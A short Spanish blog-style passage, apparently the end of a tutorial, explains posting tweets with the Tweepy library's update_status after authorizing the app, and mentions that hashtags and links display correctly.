Ya veis le pasamos la confirmación de la autorización a la Tweepy.Apy y utilizamos el modulo update_status para publicar lo que nos de la gana. Lo bueno es que si pones hashtags o enlaces ya aparecerán en Twitter bien puestos. Bueno, solo faltaría mejorarlo para que no tuvieras que autorizar a la aplicación cada vez que quieres enviar un tweet y ese tipo de cosas. Pero así es como funciona. 

Sed Buenos y jugad con esto que es divertido xD